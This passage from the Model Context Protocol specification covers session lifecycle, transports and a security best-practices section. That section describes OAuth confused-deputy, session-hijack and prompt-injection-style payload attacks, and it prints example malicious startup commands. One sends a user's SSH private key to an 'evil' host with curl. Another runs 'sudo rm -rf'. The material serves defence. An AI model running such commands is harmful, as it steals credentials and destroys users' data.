"icons": [
{
"src": "https://example.com/server-icon.svg",
"mimeType": "image/svg+xml",
"sizes": ["any"]
}
],
"websiteUrl": "https://example.com/server"
},
"instructions": "Optional instructions for the client"
}
}
```
After successful initialization, the client **MUST** send an `initialized` notification
to indicate it is ready to begin normal operations:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/initialized"
}
```
* The client **SHOULD NOT** send requests other than
[pings](/specification/2025-11-25/basic/utilities/ping) before the server has responded to the
`initialize` request.
* The server **SHOULD NOT** send requests other than
[pings](/specification/2025-11-25/basic/utilities/ping) and
[logging](/specification/2025-11-25/server/utilities/logging) before receiving the `initialized`
notification.
#### Version Negotiation
In the `initialize` request, the client **MUST** send a protocol version it supports.
This **SHOULD** be the *latest* version supported by the client.
If the server supports the requested protocol version, it **MUST** respond with the same
version. Otherwise, the server **MUST** respond with another protocol version it
supports. This **SHOULD** be the *latest* version supported by the server.
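For example, if a client requests an unsupported version, the server might counter with the latest version it does support. A minimal sketch (the capabilities and server info are elided for brevity):
```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 1,
  "result": {
    "protocolVersion": "2025-03-26",
    "capabilities": {},
    "serverInfo": {
      "name": "ExampleServer",
      "version": "1.0.0"
    }
  }
}
```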
If the client does not support the version in the server's response, it **SHOULD**
disconnect.
If using HTTP, the client **MUST** include the `MCP-Protocol-Version: <protocol-version>` HTTP header on all subsequent requests to the MCP
server.
For details, see [the Protocol Version Header section in Transports](/specification/2025-11-25/basic/transports#protocol-version-header).
#### Capability Negotiation
Client and server capabilities establish which optional protocol features will be
available during the session.
Key capabilities include:
| Category | Capability | Description |
| -------- | -------------- | --------------------------------------------------------------------------------------------- |
| Client | `roots` | Ability to provide filesystem [roots](/specification/2025-11-25/client/roots) |
| Client | `sampling` | Support for LLM [sampling](/specification/2025-11-25/client/sampling) requests |
| Client | `elicitation` | Support for server [elicitation](/specification/2025-11-25/client/elicitation) requests |
| Client | `tasks` | Support for [task-augmented](/specification/2025-11-25/basic/utilities/tasks) client requests |
| Client | `experimental` | Describes support for non-standard experimental features |
| Server | `prompts` | Offers [prompt templates](/specification/2025-11-25/server/prompts) |
| Server | `resources` | Provides readable [resources](/specification/2025-11-25/server/resources) |
| Server | `tools` | Exposes callable [tools](/specification/2025-11-25/server/tools) |
| Server | `logging` | Emits structured [log messages](/specification/2025-11-25/server/utilities/logging) |
| Server | `completions` | Supports argument [autocompletion](/specification/2025-11-25/server/utilities/completion) |
| Server | `tasks` | Support for [task-augmented](/specification/2025-11-25/basic/utilities/tasks) server requests |
| Server | `experimental` | Describes support for non-standard experimental features |
Capability objects can describe sub-capabilities like:
* `listChanged`: Support for list change notifications (for prompts, resources, and
tools)
* `subscribe`: Support for subscribing to individual items' changes (resources only)
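For example, a server declaring the `resources` capability with both sub-capabilities would send the following fragment in its initialize result:
```json theme={null}
{
  "capabilities": {
    "resources": {
      "subscribe": true,
      "listChanged": true
    }
  }
}
```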
### Operation
During the operation phase, the client and server exchange messages according to the
negotiated capabilities.
Both parties **MUST**:
* Respect the negotiated protocol version
* Only use capabilities that were successfully negotiated
### Shutdown
During the shutdown phase, one side (usually the client) cleanly terminates the protocol
connection. No specific shutdown messages are defined—instead, the underlying transport
mechanism should be used to signal connection termination:
#### stdio
For the stdio [transport](/specification/2025-11-25/basic/transports), the client **SHOULD** initiate
shutdown by:
1. First, closing the input stream to the child process (the server)
2. Waiting for the server to exit, or sending `SIGTERM` if the server does not exit
within a reasonable time
3. Sending `SIGKILL` if the server does not exit within a reasonable time after `SIGTERM`
The server **MAY** initiate shutdown by closing its output stream to the client and
exiting.
#### HTTP
For HTTP [transports](/specification/2025-11-25/basic/transports), shutdown is indicated by closing the
associated HTTP connection(s).
## Timeouts
Implementations **SHOULD** establish timeouts for all sent requests, to prevent hung
connections and resource exhaustion. When the request has not received a success or error
response within the timeout period, the sender **SHOULD** issue a [cancellation
notification](/specification/2025-11-25/basic/utilities/cancellation) for that request and stop waiting for
a response.
SDKs and other middleware **SHOULD** allow these timeouts to be configured on a
per-request basis.
Implementations **MAY** choose to reset the timeout clock when receiving a [progress
notification](/specification/2025-11-25/basic/utilities/progress) corresponding to the request, as this
implies that work is actually happening. However, implementations **SHOULD** always
enforce a maximum timeout, regardless of progress notifications, to limit the impact of a
misbehaving client or server.
## Error Handling
Implementations **SHOULD** be prepared to handle these error cases:
* Protocol version mismatch
* Failure to negotiate required capabilities
* Request [timeouts](#timeouts)
Example initialization error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32602,
"message": "Unsupported protocol version",
"data": {
"supported": ["2024-11-05"],
"requested": "1.0.0"
}
}
}
```
# Security Best Practices
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/security_best_practices
## Introduction
### Purpose and Scope
This document provides security considerations for the Model Context Protocol (MCP), complementing the [MCP Authorization](../basic/authorization) specification. This document identifies security risks, attack vectors, and best practices specific to MCP implementations.
The primary audience for this document includes developers implementing MCP authorization flows, MCP server operators, and security professionals evaluating MCP-based systems. This document should be read alongside the MCP Authorization specification and [OAuth 2.0 security best practices](https://datatracker.ietf.org/doc/html/rfc9700).
## Attacks and Mitigations
This section gives a detailed description of attacks on MCP implementations, along with potential countermeasures.
### Confused Deputy Problem
Attackers can exploit MCP proxy servers that connect to third-party APIs, creating "[confused deputy](https://en.wikipedia.org/wiki/Confused_deputy_problem)" vulnerabilities. This attack allows malicious clients to obtain authorization codes without proper user consent by exploiting the combination of static client IDs, dynamic client registration, and consent cookies.
#### Terminology
**MCP Proxy Server**
: An MCP server that connects MCP clients to third-party APIs, offering MCP features while delegating operations and acting as a single OAuth client to the third-party API server.
**Third-Party Authorization Server**
: Authorization server that protects the third-party API. It may lack dynamic client registration support, requiring the MCP proxy to use a static client ID for all requests.
**Third-Party API**
: The protected resource server that provides the actual API functionality. Access to this
API requires tokens issued by the third-party authorization server.
**Static Client ID**
: A fixed OAuth 2.0 client identifier used by the MCP proxy server when communicating with
the third-party authorization server. This Client ID refers to the MCP server acting as a client
to the Third-Party API. It is the same value for all interactions between the MCP server and the Third-Party API, regardless of
which MCP client initiated the request.
#### Vulnerable Conditions
This attack becomes possible when all of the following conditions are present:
* MCP proxy server uses a **static client ID** with a third-party authorization server
* MCP proxy server allows MCP clients to **dynamically register** (each getting their own `client_id`)
* The third-party authorization server sets a **consent cookie** after the first authorization
* MCP proxy server does not implement proper per-client consent before forwarding to third-party authorization
#### Architecture and Attack Flows
##### Normal OAuth proxy usage (preserves user consent)
```mermaid theme={null}
sequenceDiagram
participant UA as User-Agent (Browser)
participant MC as MCP Client
participant M as MCP Proxy Server
participant TAS as Third-Party Authorization Server
Note over UA,M: Initial Auth flow completed
Note over UA,TAS: Step 1: Legitimate user consent for Third Party Server
M->>UA: Redirect to third party authorization server
UA->>TAS: Authorization request (client_id: mcp-proxy)
TAS->>UA: Authorization consent screen
Note over UA: Review consent screen
UA->>TAS: Approve
TAS->>UA: Set consent cookie for client ID: mcp-proxy
TAS->>UA: 3P Authorization code + redirect to mcp-proxy-server.com
UA->>M: 3P Authorization code
Note over M,TAS: Exchange 3P code for 3P token
Note over M: Generate MCP authorization code
M->>UA: Redirect to MCP Client with MCP authorization code
Note over M,UA: Exchange code for token, etc.
```
##### Malicious OAuth proxy usage (skips user consent)
```mermaid theme={null}
sequenceDiagram
participant UA as User-Agent (Browser)
participant M as MCP Proxy Server
participant TAS as Third-Party Authorization Server
participant A as Attacker
Note over UA,A: Step 2: Attack (leveraging existing cookie, skipping consent)
A->>M: Dynamically register malicious client, redirect_uri: attacker.com
A->>UA: Sends malicious link
UA->>TAS: Authorization request (client_id: mcp-proxy) + consent cookie
rect rgba(255, 17, 0, 0.67)
TAS->>TAS: Cookie present, consent skipped
end
TAS->>UA: 3P Authorization code + redirect to mcp-proxy-server.com
UA->>M: 3P Authorization code
Note over M,TAS: Exchange 3P code for 3P token
Note over M: Generate MCP authorization code
M->>UA: Redirect to attacker.com with MCP Authorization code
UA->>A: MCP Authorization code delivered to attacker.com
Note over M,A: Attacker exchanges MCP code for MCP token
A->>M: Attacker impersonates user to MCP server
```
#### Attack Description
When an MCP proxy server uses a static client ID to authenticate with a third-party
authorization server, the following attack becomes possible:
1. A user authenticates normally through the MCP proxy server to access the third-party API
2. During this flow, the third-party authorization server sets a cookie on the user agent
indicating consent for the static client ID
3. An attacker later sends the user a malicious link containing a crafted authorization request which contains a malicious redirect URI along with a new dynamically registered client ID
4. When the user clicks the link, their browser still has the consent cookie from the previous legitimate request
5. The third-party authorization server detects the cookie and skips the consent screen
6. The MCP authorization code is redirected to the attacker's server (specified in the malicious `redirect_uri` parameter during [dynamic client registration](/specification/2025-11-25/basic/authorization#dynamic-client-registration))
7. The attacker exchanges the stolen authorization code for access tokens for the MCP server without the user's explicit approval
8. The attacker now has access to the third-party API as the compromised user
#### Mitigation
To prevent confused deputy attacks, MCP proxy servers **MUST** implement per-client consent and proper security controls as detailed below.
##### Consent Flow Implementation
The following diagram shows how to properly implement per-client consent that runs **before** the third-party authorization flow:
```mermaid theme={null}
sequenceDiagram
participant Client as MCP Client
participant Browser as User's Browser
participant MCP as MCP Server
participant ThirdParty as Third-Party AuthZ Server
Note over Client,ThirdParty: 1. Client Registration (Dynamic)
Client->>MCP: Register with redirect_uri
MCP-->>Client: client_id
Note over Client,ThirdParty: 2. Authorization Request
Client->>Browser: Open MCP server authorization URL
Browser->>MCP: GET /authorize?client_id=...&redirect_uri=...
alt Check MCP Server Consent
MCP->>MCP: Check consent for this client_id
Note over MCP: Not previously approved
end
MCP->>Browser: Show MCP server-owned consent page
Note over Browser: "Allow [Client Name] to access [Third-Party API]?"
Browser->>MCP: POST /consent (approve)
MCP->>MCP: Store consent decision for client_id
Note over Client,ThirdParty: 3. Forward to Third-Party
MCP->>Browser: Redirect to third-party /authorize
Note over MCP: Use static client_id for third-party
Browser->>ThirdParty: Authorization request (static client_id)
ThirdParty->>Browser: User authenticates & consents
ThirdParty->>Browser: Redirect with auth code
Browser->>MCP: Callback with third-party code
MCP->>ThirdParty: Exchange code for token (using static client_id)
MCP->>Browser: Redirect to client's registered redirect_uri
```
##### Required Protections
**Per-Client Consent Storage**
MCP proxy servers **MUST**:
* Maintain a registry of approved `client_id` values per user
* Check this registry **before** initiating the third-party authorization flow
* Store consent decisions securely (server-side database, or server-specific cookies)
**Consent UI Requirements**
The MCP-level consent page **MUST**:
* Clearly identify the requesting MCP client by name
* Display the specific third-party API scopes being requested
* Show the registered `redirect_uri` where tokens will be sent
* Implement CSRF protection (e.g., state parameter, CSRF tokens)
* Prevent framing via the `frame-ancestors` CSP directive or `X-Frame-Options: DENY` to protect against clickjacking
**Consent Cookie Security**
If using cookies to track consent decisions, they **MUST**:
* Use `__Host-` prefix for cookie names
* Set `Secure`, `HttpOnly`, and `SameSite=Lax` attributes
* Be cryptographically signed or use server-side sessions
* Bind to the specific `client_id` (not just "user has consented")
**Redirect URI Validation**
The MCP proxy server **MUST**:
* Validate that the `redirect_uri` in authorization requests exactly matches the registered URI
* Reject requests if the `redirect_uri` has changed without re-registration
* Use exact string matching (not pattern matching or wildcards)
**OAuth State Parameter Validation**
The OAuth `state` parameter is critical to prevent authorization code interception and CSRF attacks. Proper state validation ensures that consent approval at the authorization endpoint is enforced at the callback endpoint.
MCP proxy servers implementing OAuth flows **MUST**:
* Generate a cryptographically secure random `state` value for each authorization request
* Store the `state` value server-side (in a secure session store or encrypted cookie) **only after** consent has been explicitly approved
* Set the `state` tracking cookie/session **immediately before** redirecting to the third-party identity provider (not before consent approval)
* Validate at the callback endpoint that the `state` query parameter exactly matches the stored value in the callback request's cookies or in the request's cookie-based session
* Reject any callback requests where the `state` parameter is missing or does not match
* Ensure `state` values are single-use (delete after validation) and have a short expiration time (e.g., 10 minutes)
The consent cookie or session containing the `state` value **MUST NOT** be set until **after** the user has approved the consent screen at the MCP server's authorization endpoint. Setting this cookie before consent approval renders the consent screen ineffective, as an attacker could bypass it by crafting a malicious authorization request.
### Token Passthrough
"Token passthrough" is an anti-pattern where an MCP server accepts tokens from an MCP client without validating that the tokens were properly issued *to the MCP server* and passes them through to the downstream API.
#### Risks
Token passthrough is explicitly forbidden in the [authorization specification](/specification/2025-11-25/basic/authorization) as it introduces a number of security risks, including:
* **Security Control Circumvention**
* The MCP Server or downstream APIs might implement important security controls like rate limiting, request validation, or traffic monitoring that depend on the token audience or other credential constraints. If clients can obtain and use tokens directly with the downstream APIs without the MCP server validating them properly or ensuring that the tokens are issued for the right service, they bypass these controls.
* **Accountability and Audit Trail Issues**
* The MCP Server will be unable to identify or distinguish between MCP Clients when clients are calling with an upstream-issued access token which may be opaque to the MCP Server.
* The downstream Resource Server’s logs may show requests that appear to come from a different source with a different identity, rather than the MCP server that is actually forwarding the tokens.
* Both factors make incident investigation, controls, and auditing more difficult.
* If the MCP Server passes tokens without validating their claims (e.g., roles, privileges, or audience) or other metadata, a malicious actor in possession of a stolen token can use the server as a proxy for data exfiltration.
* **Trust Boundary Issues**
* The downstream Resource Server grants trust to specific entities. This trust might include assumptions about origin or client behavior patterns. Breaking this trust boundary could lead to unexpected issues.
* If the token is accepted by multiple services without proper validation, an attacker compromising one service can use the token to access other connected services.
* **Future Compatibility Risk**
* Even if an MCP Server starts as a "pure proxy" today, it might need to add security controls later. Starting with proper token audience separation makes it easier to evolve the security model.
#### Mitigation
MCP servers **MUST NOT** accept any tokens that were not explicitly issued for the MCP server.
### Session Hijacking
Session hijacking is an attack vector where a client is provided a session ID by the server, and an unauthorized party is able to obtain and use that same session ID to impersonate the original client and perform unauthorized actions on their behalf.
#### Session Hijack Prompt Injection
```mermaid theme={null}
sequenceDiagram
participant Client
participant ServerA
participant Queue
participant ServerB
participant Attacker
Client->>ServerA: Initialize (connect to streamable HTTP server)
ServerA-->>Client: Respond with session ID
Attacker->>ServerB: Access/guess session ID
Note right of Attacker: Attacker knows/guesses session ID
Attacker->>ServerB: Trigger event (malicious payload, using session ID)
ServerB->>Queue: Enqueue event (keyed by session ID)
ServerA->>Queue: Poll for events (using session ID)
Queue-->>ServerA: Event data (malicious payload)
ServerA-->>Client: Async response (malicious payload)
Client->>Client: Acts based on malicious payload
```
#### Session Hijack Impersonation
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
participant Attacker
Client->>Server: Initialize (login/authenticate)
Server-->>Client: Respond with session ID (persistent session created)
Attacker->>Server: Access/guess session ID
Note right of Attacker: Attacker knows/guesses session ID
Attacker->>Server: Make API call (using session ID, no re-auth)
Server-->>Attacker: Respond as if Attacker is Client (session hijack)
```
#### Attack Description
When you have multiple stateful HTTP servers that handle MCP requests, the following attack vectors are possible:
**Session Hijack Prompt Injection**
1. The client connects to **Server A** and receives a session ID.
2. The attacker obtains an existing session ID and sends a malicious event to **Server B** with said session ID.
* When a server supports [redelivery/resumable streams](/specification/2025-11-25/basic/transports#resumability-and-redelivery), deliberately terminating the request before receiving the response could lead to it being resumed by the original client via the GET request for server-sent events.
* If a particular server initiates server-sent events as a consequence of a tool call, such as a `notifications/tools/list_changed`, where it is possible to affect the tools that are offered by the server, a client could end up with tools that they were not aware were enabled.
3. **Server B** enqueues the event (associated with session ID) into a shared queue.
4. **Server A** polls the queue for events using the session ID and retrieves the malicious payload.
5. **Server A** sends the malicious payload to the client as an asynchronous or resumed response.
6. The client receives and acts on the malicious payload, leading to potential compromise.
**Session Hijack Impersonation**
1. The MCP client authenticates with the MCP server, creating a persistent session ID.
2. The attacker obtains the session ID.
3. The attacker makes calls to the MCP server using the session ID.
4. MCP server does not check for additional authorization and treats the attacker as a legitimate user, allowing unauthorized access or actions.
#### Mitigation
To prevent session hijacking and event injection attacks, the following mitigations should be implemented:
MCP servers that implement authorization **MUST** verify all inbound requests.
MCP Servers **MUST NOT** use sessions for authentication.
MCP servers **MUST** use secure, non-deterministic session IDs.
Generated session IDs (e.g., UUIDs) **SHOULD** use secure random number generators. Avoid predictable or sequential session identifiers that could be guessed by an attacker. Rotating or expiring session IDs can also reduce the risk.
MCP servers **SHOULD** bind session IDs to user-specific information.
When storing or transmitting session-related data (e.g., in a queue), combine the session ID with information unique to the authorized user, such as their internal user ID. Use a key format like `<user_id>:<session_id>`. This ensures that even if an attacker guesses a session ID, they cannot impersonate another user, as the user ID is derived from the user token and not provided by the client.
MCP servers can optionally leverage additional unique identifiers.
### Local MCP Server Compromise
Local MCP servers are MCP Servers running on a user's local machine, whether downloaded and executed by the user, authored by the user, or installed through a client's configuration flows. These servers may have direct access to the user's system and may be accessible to other processes running on the user's machine, making them attractive targets for attacks.
#### Attack Description
Local MCP servers are binaries that are downloaded and executed on the same machine as the MCP client. Without proper sandboxing and consent requirements in place, the following attacks become possible:
1. An attacker includes a malicious "startup" command in a client configuration
2. An attacker distributes a malicious payload inside the server itself
3. An attacker accesses an insecure local server that's left running on localhost via DNS rebinding
Example malicious startup commands that could be embedded:
```bash theme={null}
# Data exfiltration
npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil-location
# Privilege escalation
sudo rm -rf /important/system/files && echo "MCP server installed!"
```
#### Risks
Local MCP servers with inadequate restrictions or from untrusted sources introduce several critical security risks:
* **Arbitrary code execution**. Attackers can execute any command with MCP client privileges.
* **No visibility**. Users have no insight into what commands are being executed.
* **Command obfuscation**. Malicious actors can use complex or convoluted commands to appear legitimate.
* **Data exfiltration**. Attackers can access legitimate local MCP servers via compromised JavaScript.
* **Data loss**. Attackers or bugs in legitimate servers could lead to irrecoverable data loss on the host machine.
#### Mitigation
If an MCP client supports one-click local MCP server configuration, it **MUST** implement proper consent mechanisms prior to executing commands.
**Pre-Configuration Consent**
Display a clear consent dialog before connecting a new local MCP server via one-click configuration. The MCP client **MUST**:
* Show the exact command that will be executed, without truncation (include arguments and parameters)
* Clearly identify it as a potentially dangerous operation that executes code on the user's system
* Require explicit user approval before proceeding
* Allow users to cancel the configuration
The MCP client **SHOULD** implement additional checks and guardrails to mitigate potential code execution attack vectors:
* Highlight potentially dangerous command patterns (e.g., commands containing `sudo`, `rm -rf`, network operations, file system access outside expected directories)
* Display warnings for commands that access sensitive locations (home directory, SSH keys, system directories)
* Warn that MCP servers run with the same privileges as the client
* Execute MCP server commands in a sandboxed environment with minimal default privileges
* Launch MCP servers with restricted access to the file system, network, and other system resources
* Provide mechanisms for users to explicitly grant additional privileges (e.g., specific directory access, network access) when needed
* Use platform-appropriate sandboxing technologies (containers, chroot, application sandboxes, etc.)
Authors of MCP servers intended to run locally **SHOULD** implement measures to prevent unauthorized usage by malicious processes:
* Use the `stdio` transport to limit access to just the MCP client
* Restrict access if using an HTTP transport, for example:
  * Require an authorization token
  * Use Unix domain sockets or other Interprocess Communication (IPC) mechanisms with restricted access
### Scope Minimization
Poor scope design increases token compromise impact, elevates user friction, and obscures audit trails.
#### Attack Description
An attacker obtains (via log leakage, memory scraping, or local interception) an access token carrying broad scopes (`files:*`, `db:*`, `admin:*`) that were granted up front because the MCP server exposed every scope in `scopes_supported` and the client requested them all. The token enables lateral data access, privilege chaining, and difficult revocation without re-consenting the entire surface.
#### Risks
* Expanded blast radius: stolen broad token enables unrelated tool/resource access
* Higher friction on revocation: revoking a max-privilege token disrupts all workflows
* Audit noise: single omnibus scope masks user intent per operation
* Privilege chaining: attacker can immediately invoke high-risk tools without further elevation prompts
* Consent abandonment: users decline dialogs listing excessive scopes
* Scope inflation blindness: lack of metrics makes over-broad requests normalized
#### Mitigation
Implement a progressive, least-privilege scope model:
* Minimal initial scope set (e.g., `mcp:tools-basic`) containing only low-risk discovery/read operations
* Incremental elevation via targeted `WWW-Authenticate` `scope="..."` challenges when privileged operations are first attempted
* Down-scoping tolerance: servers should accept reduced-scope tokens; the authorization server **MAY** issue a subset of requested scopes
Server guidance:
* Emit precise scope challenges; avoid returning the full catalog
* Log elevation events (scope requested, granted subset) with correlation IDs
Client guidance:
* Begin with only baseline scopes (or those specified by initial `WWW-Authenticate`)
* Cache recent failures to avoid repeated elevation loops for denied scopes
#### Common Mistakes
* Publishing all possible scopes in `scopes_supported`
* Using wildcard or omnibus scopes (`*`, `all`, `full-access`)
* Bundling unrelated privileges to preempt future prompts
* Returning entire scope catalog in every challenge
* Silent scope semantic changes without versioning
* Treating claimed scopes in token as sufficient without server-side authorization logic
Proper minimization constrains compromise impact, improves audit clarity, and reduces consent churn.
# Transports
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/transports
**Protocol Revision**: 2025-11-25
MCP uses JSON-RPC to encode messages. JSON-RPC messages **MUST** be UTF-8 encoded.
The protocol currently defines two standard transport mechanisms for client-server
communication:
1. [stdio](#stdio), communication over standard in and standard out
2. [Streamable HTTP](#streamable-http)
Clients **SHOULD** support stdio whenever possible.
It is also possible for clients and servers to implement
[custom transports](#custom-transports) in a pluggable fashion.
## stdio
In the **stdio** transport:
* The client launches the MCP server as a subprocess.
* The server reads JSON-RPC messages from its standard input (`stdin`) and sends messages
to its standard output (`stdout`).
* Messages are individual JSON-RPC requests, notifications, or responses.
* Messages are delimited by newlines, and **MUST NOT** contain embedded newlines (see the example after this list).
* The server **MAY** write UTF-8 strings to its standard error (`stderr`) for any
logging purposes including informational, debug, and error messages.
* The client **MAY** capture, forward, or ignore the server's `stderr` output
and **SHOULD NOT** assume `stderr` output indicates error conditions.
* The server **MUST NOT** write anything to its `stdout` that is not a valid MCP message.
* The client **MUST NOT** write anything to the server's `stdin` that is not a valid MCP
message.
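For example, a `ping` request written to the server's `stdin` is a single line of JSON followed by a newline:
```json theme={null}
{"jsonrpc": "2.0", "id": 1, "method": "ping"}
```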
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server Process
Client->>+Server Process: Launch subprocess
loop Message Exchange
Client->>Server Process: Write to stdin
Server Process->>Client: Write to stdout
Server Process--)Client: Optional logs on stderr
end
Client->>Server Process: Close stdin, terminate subprocess
deactivate Server Process
```
## Streamable HTTP
This replaces the [HTTP+SSE
transport](/specification/2024-11-05/basic/transports#http-with-sse) from
protocol version 2024-11-05. See the [backwards compatibility](#backwards-compatibility)
guide below.
In the **Streamable HTTP** transport, the server operates as an independent process that
can handle multiple client connections. This transport uses HTTP POST and GET requests.
The server can optionally make use of
[Server-Sent Events](https://en.wikipedia.org/wiki/Server-sent_events) (SSE) to stream
multiple server messages. This permits basic MCP servers, as well as more feature-rich
servers supporting streaming and server-to-client notifications and requests.
The server **MUST** provide a single HTTP endpoint path (hereafter referred to as the
**MCP endpoint**) that supports both POST and GET methods. For example, this could be a
URL like `https://example.com/mcp`.
#### Security Warning
When implementing Streamable HTTP transport:
1. Servers **MUST** validate the `Origin` header on all incoming connections to prevent DNS rebinding attacks
* If the `Origin` header is present and invalid, servers **MUST** respond with HTTP 403 Forbidden. The HTTP response
body **MAY** comprise a JSON-RPC *error response* that has no `id`
2. When running locally, servers **SHOULD** bind only to localhost (127.0.0.1) rather than all network interfaces (0.0.0.0)
3. Servers **SHOULD** implement proper authentication for all connections
Without these protections, attackers could use DNS rebinding to interact with local MCP servers from remote websites.
### Sending Messages to the Server
Every JSON-RPC message sent from the client **MUST** be a new HTTP POST request to the
MCP endpoint.
1. The client **MUST** use HTTP POST to send JSON-RPC messages to the MCP endpoint.
2. The client **MUST** include an `Accept` header, listing both `application/json` and
`text/event-stream` as supported content types.
3. The body of the POST request **MUST** be a single JSON-RPC *request*, *notification*, or *response*.
4. If the input is a JSON-RPC *response* or *notification*:
* If the server accepts the input, the server **MUST** return HTTP status code 202
Accepted with no body.
* If the server cannot accept the input, it **MUST** return an HTTP error status code
(e.g., 400 Bad Request). The HTTP response body **MAY** comprise a JSON-RPC *error
response* that has no `id`.
5. If the input is a JSON-RPC *request*, the server **MUST** either
return `Content-Type: text/event-stream`, to initiate an SSE stream, or
`Content-Type: application/json`, to return one JSON object. The client **MUST**
support both these cases.
6. If the server initiates an SSE stream:
* The server **SHOULD** immediately send an SSE event consisting of an event
ID and an empty `data` field in order to prime the client to reconnect
(using that event ID as `Last-Event-ID`).
* After the server has sent an SSE event with an event ID to the client, the
server **MAY** close the *connection* (without terminating the *SSE stream*)
at any time in order to avoid holding a long-lived connection. The client
**SHOULD** then "poll" the SSE stream by attempting to reconnect.
* If the server does close the *connection* prior to terminating the *SSE stream*,
it **SHOULD** send an SSE event with a standard [`retry`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22retry%22) field before
closing the connection. The client **MUST** respect the `retry` field,
waiting the given number of milliseconds before attempting to reconnect.
* The SSE stream **SHOULD** eventually include a JSON-RPC *response* for the
JSON-RPC *request* sent in the POST body.
* The server **MAY** send JSON-RPC *requests* and *notifications* before sending the
JSON-RPC *response*. These messages **SHOULD** relate to the originating client
*request*.
* The server **MAY** terminate the SSE stream if the [session](#session-management)
expires.
* After the JSON-RPC *response* has been sent, the server **SHOULD** terminate the
SSE stream.
* Disconnection **MAY** occur at any time (e.g., due to network conditions).
Therefore:
* Disconnection **SHOULD NOT** be interpreted as the client cancelling its request.
* To cancel, the client **SHOULD** explicitly send an MCP `CancelledNotification`.
* To avoid message loss due to disconnection, the server **MAY** make the stream
[resumable](#resumability-and-redelivery).
### Listening for Messages from the Server
1. The client **MAY** issue an HTTP GET to the MCP endpoint. This can be used to open an
SSE stream, allowing the server to communicate to the client, without the client first
sending data via HTTP POST.
2. The client **MUST** include an `Accept` header, listing `text/event-stream` as a
supported content type.
3. The server **MUST** either return `Content-Type: text/event-stream` in response to
this HTTP GET, or else return HTTP 405 Method Not Allowed, indicating that the server
does not offer an SSE stream at this endpoint.
4. If the server initiates an SSE stream:
* The server **MAY** send JSON-RPC *requests* and *notifications* on the stream.
* These messages **SHOULD** be unrelated to any concurrently-running JSON-RPC
*request* from the client.
* The server **MUST NOT** send a JSON-RPC *response* on the stream **unless**
[resuming](#resumability-and-redelivery) a stream associated with a previous client
request.
* The server **MAY** close the SSE stream at any time.
* If the server closes the *connection* without terminating the *stream*, it
**SHOULD** follow the same polling behavior as described for POST requests:
sending a `retry` field and allowing the client to reconnect.
* The client **MAY** close the SSE stream at any time.
### Multiple Connections
1. The client **MAY** remain connected to multiple SSE streams simultaneously.
2. The server **MUST** send each of its JSON-RPC messages on only one of the connected
streams; that is, it **MUST NOT** broadcast the same message across multiple streams.
* The risk of message loss **MAY** be mitigated by making the stream
[resumable](#resumability-and-redelivery).
### Resumability and Redelivery
To support resuming broken connections, and redelivering messages that might otherwise be
lost:
1. Servers **MAY** attach an `id` field to their SSE events, as described in the
[SSE standard](https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation).
* If present, the ID **MUST** be globally unique across all streams within that
[session](#session-management)—or all streams with that specific client, if session
management is not in use.
* Event IDs **SHOULD** encode sufficient information to identify the originating
stream, enabling the server to correlate a `Last-Event-ID` to the correct stream.
2. If the client wishes to resume after a disconnection (whether due to network failure
or server-initiated closure), it **SHOULD** issue an HTTP GET to the MCP endpoint,
and include the
[`Last-Event-ID`](https://html.spec.whatwg.org/multipage/server-sent-events.html#the-last-event-id-header)
header to indicate the last event ID it received.
* The server **MAY** use this header to replay messages that would have been sent
after the last event ID, *on the stream that was disconnected*, and to resume the
stream from that point.
* The server **MUST NOT** replay messages that would have been delivered on a
different stream.
* This mechanism applies regardless of how the original stream was initiated (via
POST or GET). Resumption is always via HTTP GET with `Last-Event-ID`.
In other words, these event IDs should be assigned by servers on a *per-stream* basis, to
act as a cursor within that particular stream.
### Session Management
An MCP "session" consists of logically related interactions between a client and a
server, beginning with the [initialization phase](/specification/2025-11-25/basic/lifecycle). To support
servers which want to establish stateful sessions:
1. A server using the Streamable HTTP transport **MAY** assign a session ID at
initialization time, by including it in an `MCP-Session-Id` header on the HTTP
response containing the `InitializeResult`.
* The session ID **SHOULD** be globally unique and cryptographically secure (e.g., a
securely generated UUID, a JWT, or a cryptographic hash).
* The session ID **MUST** only contain visible ASCII characters (ranging from 0x21 to
0x7E).
* The client **MUST** handle the session ID in a secure manner, see [Session Hijacking mitigations](/specification/2025-11-25/basic/security_best_practices#session-hijacking) for more details.
2. If an `MCP-Session-Id` is returned by the server during initialization, clients using
the Streamable HTTP transport **MUST** include it in the `MCP-Session-Id` header on
all of their subsequent HTTP requests.
* Servers that require a session ID **SHOULD** respond to requests without an
`MCP-Session-Id` header (other than initialization) with HTTP 400 Bad Request.
3. The server **MAY** terminate the session at any time, after which it **MUST** respond
to requests containing that session ID with HTTP 404 Not Found.
4. When a client receives HTTP 404 in response to a request containing an
`MCP-Session-Id`, it **MUST** start a new session by sending a new `InitializeRequest`
without a session ID attached.
5. Clients that no longer need a particular session (e.g., because the user is leaving
the client application) **SHOULD** send an HTTP DELETE to the MCP endpoint with the
`MCP-Session-Id` header, to explicitly terminate the session.
* The server **MAY** respond to this request with HTTP 405 Method Not Allowed,
indicating that the server does not allow clients to terminate sessions.
### Sequence Diagram
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
note over Client, Server: initialization
Client->>+Server: POST InitializeRequest
Server->>-Client: InitializeResponse MCP-Session-Id: 1868a90c...
Client->>+Server: POST InitializedNotification MCP-Session-Id: 1868a90c...
Server->>-Client: 202 Accepted
note over Client, Server: client requests
Client->>+Server: POST ... request ... MCP-Session-Id: 1868a90c...
alt single HTTP response
Server->>Client: ... response ...
else server opens SSE stream
loop while connection remains open
Server-)Client: ... SSE messages from server ...
end
Server-)Client: SSE event: ... response ...
end
deactivate Server
note over Client, Server: client notifications/responses
Client->>+Server: POST ... notification/response ... MCP-Session-Id: 1868a90c...
Server->>-Client: 202 Accepted
note over Client, Server: server requests
Client->>+Server: GET MCP-Session-Id: 1868a90c...
loop while connection remains open
Server-)Client: ... SSE messages from server ...
end
deactivate Server
```
### Protocol Version Header
